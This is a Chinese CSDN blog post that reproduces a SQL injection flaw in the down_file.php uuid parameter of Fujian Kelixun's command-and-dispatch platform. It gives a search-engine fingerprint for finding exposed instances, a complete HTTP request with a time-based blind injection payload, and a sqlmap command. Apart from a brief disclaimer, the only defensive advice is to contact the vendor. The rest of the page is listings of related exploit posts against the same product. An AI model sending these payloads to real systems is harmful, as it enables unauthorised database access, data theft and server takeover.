【1day漏洞复现】福建科立讯通信 指挥调度管理平台down_file.php?uuid存在SQL注入漏洞

已于 2024-03-27 13:36:05 修改
阅读量148 收藏 4
点赞数 1
文章标签: php 开发语言
于 2024-03-27 11:35:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34780861/article/details/137072437
版权

更多干货POC获取,请关注公众号:如棠安全

Nx01 阅读须知

      如棠安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

Nx02 漏洞描述

      福建科立讯通信 指挥调度管理平台SQL注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

Nx03 系统指纹
鹰图:web.body="指挥调度管理平台"

Nx04 产品主页

Nx05 漏洞复现

存在时间盲注

GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(7)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

sqlmap验证:python sqlmap.py -u "http://xxx.xxx.xxx.xxx/api/client/down_file.php?uuid=1"

Nx06 修复建议

联系厂商进行系统升级

更多干货POC获取,请关注公众号:如棠安全

如棠安全
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
福建科立通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621、CVE-2024-2622、CVE-2024-2566)
0xSec
03-22 784
福建科立通信指挥调度管理平台 down_file.php、pwd_update.php、editemedia.php、get_extension_yl.php、get_extension_yl.php等接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
科立应急融合通信系统解决方案(1)(1)(2).docx
12-17
科立应急融合通信系统解决方案(1)(1)(2).docx
漏洞复现福建科立通信-指挥调度平台-get-gis-fence-warning-sql注入
知黑而守白
01-18 119
福建科立通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。福建科立通信指挥调度平台 get-gis-fence-warning 接口处存在SQL注入漏洞
福建科立通信 指挥调度管理平台多处RCE漏洞复现
0xSec
01-04 746
福建科立通信有限公司指挥调度管理平台vmonitor.php、invite2videoconf.php、restcontroler.php等接口处存在远程命令执行漏洞,未经身份认证的攻击者可通给该漏洞远程执行命令,写入后门文件可导致服务器失陷。
福建科立通信 指挥调度管理平台 多处文件上传漏洞复现
0xSec
01-04 1079
福建科立通信有限公司指挥调度管理平台upload.php、task/uploadfile.php、event/uploadfile.php多处接口存在文件上传漏洞,未经身份认证的攻击者可通给该漏洞写入后门文件,可导致服务器失陷。
漏洞复现福建科立通信-指挥调度平台-down_file-sql注入
知黑而守白
03-22 71
福建科立通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。福建科立通信指挥调度管理平台 down_file 接口存在SQL注入漏洞
漏洞复现福建科立通信-指挥调度平台-pwd_update-sql注入
知黑而守白
03-25 150
福建科立通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。福建科立通信指挥调度管理平台 pwd_update 接口存在SQL注入漏洞
福建科立通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621)
weixin_45997442的博客
04-24 372
福建科立通信指挥调度管理平台 down_file.php、pwd_update.php等接口处存在SQL注入漏洞,攻击者除了可以利用 SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现指挥调度平台down_file.php SQL注入漏洞 (CVE-2024-2620)
https://blog.echo234.cn/
03-25 234
福建科立通信调度平台是一种用于通信调度管理平台。它可以用于监控和管理通信设备、网络和资源,实现通信调度和优化。该平台可以提供实时的通信状态监测、故障诊断和处理、资源调度和优化等功能,帮助提高通信网络的可靠性和效率。平台通常包括调度中心、调度终端和通信设备等组成部分,通过集中管理和控制,实现对通信网络的全面管理调度福建科立通信指挥调度平台down_file.php 接口处SQL注入漏洞,恶意攻击者可能利用该漏洞获取服务器敏感信息,最后造成服务器失陷。
科立PT668写频软件.rar
10-24
科立对讲机PT668写频程序,适合用途广泛
科立DR550数字中转台详细介绍彩页
05-07
科立DR550对讲机数字中继DPMR双模兼容基站总台对讲机
科立PT8000 写频密码清除
04-27
科立PT8000 密码清除 400兆机器固件 需要编程器写入, 里面有2个文件,第一个文件数字文件名就是写频密码,第二个固件是没有写频密码直接可进入
KSP3500s_V1.08.EXE
03-09
科立ksp3500驱动下载
Linux网站服务
c5zm51zjr的博客
05-08 785
注:Discuz软件包安装2.5版本的,若没有需要去官网论坛上寻找,找到之后复制链接下载即可。网站架构:LAMP: Linux+Apache+MYSQL+PHP(系统+服务器程序+数据管理软件+中间软件)主配置文件:/etc/httpd/conf/httpd.conf。主目录:/var/www/html (源代码默认位置)子配置文件:/etc/httpd/conf.d/*注:网站a.org无需授权,b.org需要授权。网站:多个网页组合而成的一台网站服务器。URL:统一资源定位符,访问网站的地址。
picoCTF-Web Exploitation-Web Gauntlet
最新发布
huckers的博客
05-12 368
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除。中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入。提示sql过滤or,我们使用。
Service 和 Ingress
go|Python的个人博客
05-08 1277
Yaml 文件案例metadata:labels:app: nginx-svc # service 自己的标签spec:ports:- name: http # service 端口配置的名称protocol: TCP # 端口绑定的协议,支持 TCP、UDP、SCTP,默认为 TCPport: 1080 # service 自己的端口targetPort: 80 # 目标 pod 的端口type: NodePort # 默认是ClusterIP 类型,只能在集群内部使用。
WordPress如何判断当前页是否属于文章页或页面?
boke112的博客
05-08 272
我想在WordPress站点的文章页和页面中输出一些内容,其他页面不输出,那么我应该怎么判断当前页是否为文章页或页面呢?下面boke112百科就跟大家简单介绍一下。
科立pt8000-03写频线
01-28
科立pt8000-03写频线是一种用于通信设备中的高性能写频线。该写频线采用先进的技术和材料,具有优良的信号传输性能和抗干扰能力。它适用于各种频率的通信设备,能够稳定传输信号并保持通信质量。 科立pt8000-03写频线采用高纯度的铜线材和精密的制造工艺,确保信号传输的稳定性和可靠性。其外层绝缘材料采用特殊的材质,具有良好的耐磨损和耐高温性能,能够保护内部导线不受外界环境的影响。 写频线是通信设备中的重要部件,对于信号传输和通信质量起着关键作用。科立pt8000-03写频线经过精心设计和优化,能够最大程度地减小信号衰减和干扰,保证通信设备的稳定运行和优质通信。 除此之外,科立pt8000-03写频线还具有良好的机械强度和耐用性,能够满足通信设备在不同环境下的使用需求。它还具有易安装、易维护的特点,能够为用户提供便利的使用体验。 总之,科立pt8000-03写频线是一款性能优越、质量可靠的通信设备配件,能够满足各类通信设备对于信号传输的要求,是通信行业中的重要产品之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值